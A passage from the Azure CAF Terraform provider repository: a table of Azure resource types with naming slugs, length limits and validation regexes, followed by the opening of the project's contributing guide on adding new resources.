| azurerm_availability_set| avail| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{0,78}[a-zA-Z0-9_]$"|
| azurerm_disk_encryption_set| des| 1| 80| false| "^[a-zA-Z0-9_]{1,80}$"|
| azurerm_image| img| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{0,78}[a-zA-Z0-9_]$"|
| azurerm_linux_virtual_machine| vm| 1| 64| false| "^[^\\/\"\\[\\]:|<>+=;,?*@&_][^\\/\"\\[\\]:|<>+=;,?*@&]{0,62}[^\\/\"\\[\\]:|<>+=;,?*@&.-]$"|
| azurerm_linux_virtual_machine_scale_set| vmss| 1| 64| false| "^[^\\/\"\\[\\]:|<>+=;,?*@&_][^\\/\"\\[\\]:|<>+=;,?*@&]{0,62}[^\\/\"\\[\\]:|<>+=;,?*@&.-]$"|
| azurerm_managed_disk| dsk| 1| 80| false| "^[a-zA-Z0-9_]{1,80}$"|
| azurerm_virtual_machine| vm| 1| 15| false| "^[^\\/\"\\[\\]:|<>+=;,?*@&_][^\\/\"\\[\\]:|<>+=;,?*@&]{0,13}[^\\/\"\\[\\]:|<>+=;,?*@&.-]$"|
| azurerm_virtual_machine_scale_set| vmss| 1| 15| false| "^[^\\/\"\\[\\]:|<>+=;,?*@&_][^\\/\"\\[\\]:|<>+=;,?*@&]{0,13}[^\\/\"\\[\\]:|<>+=;,?*@&.-]$"|
| azurerm_windows_virtual_machine| vm| 1| 15| false| "^[^\\/\"\\[\\]:|<>+=;,?*@&_][^\\/\"\\[\\]:|<>+=;,?*@&]{0,13}[^\\/\"\\[\\]:|<>+=;,?*@&.-]$"|
| azurerm_windows_virtual_machine_scale_set| vmss| 1| 15| false| "^[^\\/\"\\[\\]:|<>+=;,?*@&_][^\\/\"\\[\\]:|<>+=;,?*@&]{0,13}[^\\/\"\\[\\]:|<>+=;,?*@&.-]$"|
| azurerm_containerGroups| cg| 1| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{0,61}[a-zA-Z0-9]$"|
| azurerm_container_app| ca| 1| 32| true| "^[a-z0-9][a-z0-9-]{0,30}[a-z0-9]$"|
| azurerm_container_app_environment| cae| 1| 60| false| "^[0-9A-Za-z][0-9A-Za-z-]{0,58}[0-9a-zA-Z]$"|
| azurerm_container_registry| cr| 1| 63| true| "^[a-zA-Z0-9]{1,63}$"|
| azurerm_container_registry_webhook| crwh| 1| 50| false| "^[a-zA-Z0-9]{1,50}$"|
| azurerm_kubernetes_cluster| aks| 1| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-_]{0,61}[a-zA-Z0-9]$"|
| azurerm_cosmosdb_account| cosmos| 1| 63| false| "^[a-z0-9][a-zA-Z0-9-_.]{0,61}[a-zA-Z0-9]$"|
| azurerm_custom_provider| prov| 3| 64| false| "^[^&%?\\/]{2,63}[^&%.?\\/ ]$"|
| azurerm_mariadb_server| maria| 3| 63| false| "^[a-z0-9][a-zA-Z0-9-]{1,61}[a-z0-9]$"|
| azurerm_mariadb_firewall_rule| mariafw| 1| 128| false| "^[a-zA-Z0-9-_]{1,128}$"|
| azurerm_mariadb_database| mariadb| 1| 63| false| "^[a-zA-Z0-9-_]{1,63}$"|
| azurerm_mariadb_virtual_network_rule| mariavn| 1| 128| false| "^[a-zA-Z0-9-_]{1,128}$"|
| azurerm_mysql_server| mysql| 3| 63| false| "^[a-z0-9][a-zA-Z0-9-]{1,61}[a-z0-9]$"|
| azurerm_mysql_firewall_rule| mysqlfw| 1| 128| false| "^[a-zA-Z0-9-_]{1,128}$"|
| azurerm_mysql_database| mysqldb| 1| 63| false| "^[a-zA-Z0-9-_]{1,63}$"|
| azurerm_mysql_virtual_network_rule| mysqlvn| 1| 128| false| "^[a-zA-Z0-9-_]{1,128}$"|
| azurerm_postgresql_server| psql| 3| 63| false| "^[a-z0-9][a-zA-Z0-9-]{1,61}[a-z0-9]$"|
| azurerm_postgresql_firewall_rule| psqlfw| 1| 128| false| "^[a-zA-Z0-9-_]{1,128}$"|
| azurerm_postgresql_database| psqldb| 1| 63| false| "^[a-zA-Z0-9-_]{1,63}$"|
| azurerm_postgresql_virtual_network_rule| psqlvn| 1| 128| false| "^[a-zA-Z0-9-_]{1,128}$"|
| azurerm_database_migration_project| migr| 2| 57| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,56}$"|
| azurerm_database_migration_service| dms| 2| 62| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,61}$"|
| azurerm_databricks_workspace| dbw| 3| 30| false| "^[a-zA-Z0-9-_]{3,30}$"|
| azurerm_kusto_cluster| kc| 4| 22| false| "^[a-z][a-z0-9]{3,21}$"|
| azurerm_kusto_database| kdb| 1| 260| false| "^[a-zA-Z0-9- .]{1,260}$"|
| azurerm_kusto_eventhub_data_connection| kehc| 1| 40| false| "^[a-zA-Z0-9- .]{1,40}$"|
| azurerm_data_factory| adf| 3| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,61}[a-zA-Z0-9]$"|
| azurerm_data_factory_dataset_mysql| adfmysql| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,258}[a-zA-Z0-9]$"|
| azurerm_data_factory_dataset_postgresql| adfpsql| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,258}[a-zA-Z0-9]$"|
| azurerm_data_factory_dataset_sql_server_table| adfmssql| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,258}[a-zA-Z0-9]$"|
| azurerm_data_factory_integration_runtime_managed| adfir| 3| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,61}[a-zA-Z0-9]$"|
| azurerm_data_factory_pipeline| adfpl| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,258}[a-zA-Z0-9]$"|
| azurerm_data_factory_linked_service_data_lake_storage_gen2| adfsvst| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,259}$"|
| azurerm_data_factory_linked_service_key_vault| adfsvkv| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,259}$"|
| azurerm_recovery_services_vault| rsv| 2| 50| false| "^[a-zA-Z][a-zA-Z0-9\\-]{1,49}$"|
| azurerm_recovery_services_vault_backup_police| rsvbp| 3| 150| false| "^[a-zA-Z][a-zA-Z0-9\\-]{1,148}[a-zA-Z0-9]$"|
| azurerm_data_factory_linked_service_mysql| adfsvmysql| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,259}$"|
| azurerm_data_factory_linked_service_postgresql| adfsvpsql| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,259}$"|
| azurerm_data_factory_linked_service_sql_server| adfsvmssql| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,259}$"|
| azurerm_data_factory_trigger_schedule| adftg| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,259}$"|
| azurerm_data_lake_analytics_account| dla| 3| 24| false| "^[a-z0-9]{3,24}$"|
| azurerm_data_lake_analytics_firewall_rule| dlfw| 3| 50| false| "^[a-z0-9-_]{3,50}$"|
| azurerm_data_lake_store| dls| 3| 24| false| "^[a-z0-9]{3,24}$"|
| azurerm_data_lake_store_firewall_rule| dlsfw| 3| 50| false| "^[a-zA-Z0-9-_]{3,50}$"|
| azurerm_dev_test_lab| lab| 1| 50| false| "^[a-zA-Z0-9-_]{1,50}$"|
| azurerm_dev_test_linux_virtual_machine| labvm| 1| 64| false| "^[a-zA-Z0-9-]{1,64}$"|
| azurerm_dev_test_windows_virtual_machine| labvm| 1| 15| false| "^[a-zA-Z0-9-]{1,15}$"|
| azurerm_frontdoor| fd| 5| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{3,62}[a-zA-Z0-9]$"|
| azurerm_frontdoor_firewall_policy| fdfw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_hdinsight_hadoop_cluster| hadoop| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_hbase_cluster| hbase| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_kafka_cluster| kafka| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_interactive_query_cluster| iqr| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_ml_services_cluster| mls| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_rserver_cluster| rser| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_spark_cluster| spark| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_storm_cluster| storm| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_iotcentral_application| iotapp| 2| 63| true| "^[a-z0-9][a-z0-9-]{0,61}[a-z0-9]$"|
| azurerm_iothub| iot| 3| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,48}[a-z0-9]$"|
| azurerm_iothub_consumer_group| iotcg| 1| 50| false| "^[a-zA-Z0-9-._]{1,50}$"|
| azurerm_iothub_dps| dps| 3| 64| false| "^[a-zA-Z0-9-]{1,63}[a-zA-Z0-9]$"|
| azurerm_iothub_dps_certificate| dpscert| 1| 64| false| "^[a-zA-Z0-9-._]{1,64}$"|
| azurerm_key_vault| kv| 3| 24| false| "^[a-zA-Z][a-zA-Z0-9-]{1,22}[a-zA-Z0-9]$"|
| azurerm_key_vault_key| kvk| 1| 127| false| "^[a-zA-Z0-9-]{1,127}$"|
| azurerm_key_vault_secret| kvs| 1| 127| false| "^[a-zA-Z0-9-]{1,127}$"|
| azurerm_key_vault_certificate| kvc| 1| 127| false| "^[a-zA-Z0-9-]{1,127}$"|
| azurerm_lb| lb| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_lb_nat_rule| lbnatrl| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_public_ip| pip| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_public_ip_prefix| pippf| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_route| rt| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_route_table| route| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_subnet| snet| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_traffic_manager_profile| traf| 1| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-.]{0,61}[a-zA-Z0-9_]$"|
| azurerm_virtual_wan| vwan| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_virtual_network| vnet| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,62}[a-zA-Z0-9_]$"|
| azurerm_virtual_network_gateway| vgw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_virtual_network_peering| vpeer| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_network_interface| nic| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_firewall| fw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_eventhub| evh| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_eventhub_namespace| ehn| 1| 50| false| "^[a-zA-Z][a-zA-Z0-9-]{0,48}[a-zA-Z0-9]$"|
| azurerm_eventhub_authorization_rule| ehar| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_eventhub_namespace_authorization_rule| ehnar| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_eventhub_namespace_disaster_recovery_config| ehdr| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_eventhub_consumer_group| ehcg| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_stream_analytics_job| asa| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_function_javascript_udf| asafunc| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_output_blob| asaoblob| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_output_mssql| asaomssql| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_output_eventhub| asaoeh| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_output_servicebus_queue| asaosbq| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_output_servicebus_topic| asaosbt| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_reference_input_blob| asarblob| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_stream_input_blob| asaiblob| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_stream_input_eventhub| asaieh| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_stream_input_iothub| asaiiot| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_shared_image_gallery| sig| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9.]{0,78}[a-zA-Z0-9]$"|
| azurerm_shared_image| si| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9]$"|
| azurerm_snapshots| snap| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_storage_account| st| 3| 24| true| "^[a-z0-9]{3,24}$"|
| azurerm_storage_container| stct| 3| 63| false| "^[a-z0-9][a-z0-9-]{2,62}$"|
| azurerm_storage_data_lake_gen2_filesystem| stdl| 3| 63| false| "^[a-z0-9][a-z0-9-]{1,61}[a-z0-9]$"|
| azurerm_storage_queue| stq| 3| 63| false| "^[a-z0-9][a-z0-9-]{1,61}[a-z0-9]$"|
| azurerm_storage_table| stt| 3| 63| false| "^[a-z0-9][a-z0-9-]{1,61}[a-z0-9]$"|
| azurerm_storage_share| sts| 3| 63| false| "^[a-z0-9][a-z0-9-]{1,61}[a-z0-9]$"|
| azurerm_storage_share_directory| sts| 3| 63| false| "^[a-z0-9][a-z0-9-]{1,61}[a-z0-9]$"|
| azurerm_machine_learning_workspace| mlw| 1| 260| false| "^[^<>*%:.?\\+\\/]{0,259}[^<>*%:.?\\+\\/ ]$"|
| azurerm_storage_blob| blob| 1| 1024| false| "^[^\\s\\/$#&]{1,1000}[^\\s\\/$#&]{0,24}$"|
| azurerm_bastion_host| bast| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_local_network_gateway| lgw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_application_gateway| agw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_express_route_gateway| ergw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_express_route_circuit| erc| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_point_to_site_vpn_gateway| vpngw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_template_deployment| deploy| 1| 64| false| "^[a-zA-Z0-9-._\\(\\)]{1,64}$"|
| azurerm_sql_server| sql| 1| 63| true| "^[a-z0-9][a-z0-9-]{0,61}[a-z0-9]$"|
| azurerm_mssql_server| sql| 1| 63| true| "^[a-z0-9][a-z0-9-]{0,61}[a-z0-9]$"|
| azurerm_mssql_database| sqldb| 1| 128| false| "^[^<>*%:.?\\+\\/]{1,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_sql_elasticpool| sqlep| 1| 128| false| "^[^<>*%:.?\\+\\/]{1,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_mssql_elasticpool| sqlep| 1| 128| false| "^[^<>*%:.?\\+\\/]{1,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_sql_failover_group| sqlfg| 1| 63| true| "^[a-z0-9][a-z0-9-]{0,61}[a-z0-9]$"|
| azurerm_sql_firewall_rule| sqlfw| 1| 128| false| "^[^<>*%:?\\+\\/]{1,127}[^<>*%:.?\\+\\/]$"|
| azurerm_log_analytics_workspace| log| 4| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{2,61}[a-zA-Z0-9]$"|
| azurerm_service_fabric_cluster| sf| 4| 23| true| "^[a-z][a-z0-9-]{2,21}[a-z0-9]$"|
| azurerm_maps_account| map| 1| 98| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,97}$"|
| azurerm_network_watcher| nw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_resource_group| rg| 1| 90| false| "^[a-zA-Z0-9-._\\(\\)]{0,89}[a-zA-Z0-9-_\\(\\)]$"|
| azurerm_network_security_group| nsg| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_network_security_group_rule| nsgr| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_network_security_rule| nsgr| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_application_security_group| asg| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_zone| dns| 1| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,61}[a-zA-Z0-9_]$"|
| azurerm_private_dns_zone| pdns| 1| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,61}[a-zA-Z0-9_]$"|
| azurerm_notification_hub| nh| 1| 260| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,259}$"|
| azurerm_notification_hub_namespace| dnsrec| 6| 50| false| "^[a-zA-Z][a-zA-Z0-9-]{4,48}[a-zA-Z0-9]$"|
| azurerm_notification_hub_authorization_rule| dnsrec| 1| 256| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,255}$"|
| azurerm_servicebus_namespace| sb| 6| 50| false| "^[a-zA-Z][a-zA-Z0-9-]{4,48}[a-zA-Z0-9]$"|
| azurerm_servicebus_namespace_authorization_rule| sbar| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_servicebus_queue| sbq| 1| 260| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,258}[a-zA-Z0-9_]$"|
| azurerm_servicebus_queue_authorization_rule| sbqar| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_servicebus_subscription| sbs| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_servicebus_subscription_rule| sbsr| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_servicebus_topic| sbt| 1| 260| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,258}[a-zA-Z0-9]$"|
| azurerm_servicebus_topic_authorization_rule| dnsrec| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_powerbi_embedded| pbi| 3| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{2,62}$"|
| azurerm_dashboard| dsb| 3| 160| false| "^[a-zA-Z0-9-]{3,160}$"|
| azurerm_signalr_service| sgnlr| 3| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,61}[a-zA-Z0-9]$"|
| azurerm_eventgrid_domain| egd| 3| 50| false| "^[a-zA-Z0-9-]{3,50}$"|
| azurerm_eventgrid_domain_topic| egdt| 3| 50| false| "^[a-zA-Z0-9-]{3,50}$"|
| azurerm_eventgrid_event_subscription| egs| 3| 64| false| "^[a-zA-Z0-9-]{3,64}$"|
| azurerm_eventgrid_topic| egt| 3| 50| false| "^[a-zA-Z0-9-]{3,50}$"|
| azurerm_relay_namespace| rln| 6| 50| false| "^[a-zA-Z][a-zA-Z0-9-]{4,48}[a-zA-Z0-9]$"|
| azurerm_relay_hybrid_connection| rlhc| 1| 260| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,258}[a-zA-Z0-9]$"|
| azurerm_app_service| app| 2| 60| false| "^[0-9A-Za-z][0-9A-Za-z-]{0,58}[0-9a-zA-Z]$"|
| azurerm_app_service_plan| plan| 1| 40| false| "^[0-9A-Za-z-]{1,40}$"|
| azurerm_app_service_environment| ase| 2| 36| false| "^[0-9A-Za-z-]{2,36}$"|
| azurerm_application_insights| appi| 1| 260| false| "^[^%&\\?/. ][^%&\\?/]{0,258}[^%&\\?/. ]$"|
| aks_node_pool_linux| npl| 1| 12| false| "^[a-z][0-9a-z]{0,11}$"|
| aks_node_pool_windows| npw| 1| 6| false| "^[a-z][0-9a-z]{0,5}$"|
| azurerm_synapse_workspace| syws| 1| 45| true| "^[0-9a-z]{1,45}$"|
| azurerm_synapse_spark_pool| sysp| 1| 15| true| "^[0-9a-zA-Z]{1,15}$"|
| azurerm_synapse_firewall_rule| syfw| 1| 128| false| "^[^<>*%:?\\+\\/]{1,127}[^<>*%:.?\\+\\/]$"|
cat resourceDefinition_out_of_docs.json | jq -r '.[] | "| \(.name)| \(.slug)| \(.min_length)| \(.max_length)| \(.lowercase)| \(.validation_regex)|"'
| azurerm_private_endpoint| pe| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_service_connection| psc| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_firewall_ip_configuration| fwipconf| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_firewall_application_rule_collection| fwapp| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_firewall_nat_rule_collection| fwnatrc| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_firewall_network_rule_collection| fwnetrc| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_a_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_aaaa_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_caa_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_cname_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_mx_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_ns_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_ptr_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_txt_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_a_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_aaaa_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_cname_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_mx_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_ptr_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_srv_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_txt_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_virtual_machine_extension| vmx| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_virtual_machine_scale_set_extension| vmssx| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_network_ddos_protection_plan| ddospp| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_zone_group| pdnszg| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_proximity_placement_group| ppg| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_link_service| pls| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| databricks_cluster| dbc| 3| 30| false| "^[a-zA-Z0-9-_]{3,30}$"|
| databricks_standard_cluster| dbsc| 3| 30| false| "^[a-zA-Z0-9-_]{3,30}$"|
| databricks_high_concurrency_cluster| dbhcc| 3| 30| false| "^[a-zA-Z0-9-_]{3,30}$"|
| general| | 1| 250| false| "^[a-zA-Z0-9-_]{1,250}$"|
| general_safe| | 1| 250| true| "^[a-z]{1,250}$"|
<file_sep>/.github/CONTRIBUTING.md
# Contributing to the CAF provider
👍🎉 First off, thanks for taking the time to contribute! 🎉👍
## Code of conduct
This project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/).
For more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or
contact [<EMAIL>](mailto:<EMAIL>) with any additional questions or comments.
## What should I know before I get started?
The current goal of the CAFprovider is to support the CAF landing zones but can also be used to standardize the naming convention of your projects. It is important to keep in mind that many of the design decisions on the provider have been made to accommodate the needs of CAF.
To contribute to this project you are required to have at least go 1.13 installed in your system
## Adding a new resource
Please, find below the steps that should be followed to contribute:
1. Check if the resource has been implemented already
You can find a list of resources implemented in the [README.md#resource-status](../README.md) under the resource status section.
2. Create an issue for the missing resource
If there is no [issue created already](https://github.com/aztfmod/terraform-provider-azurecaf/issues) for the implementation of this resource you should [create an issue](https://docs.github.com/en/free-pro-team@latest/github/managing-your-work-on-github/creating-an-issue) requesting the implementation of the resource.
3. Check the requirements for your resource Name
You can check the requirements for your resource name in the [docs](https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/resource-name-rules) or by checking the error message returned when trying to create the resource on Azure with an invalid name. Slug value can also be checked in the CAF [docs](https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/resource-abbreviations).
4. Choose the slug for the resource
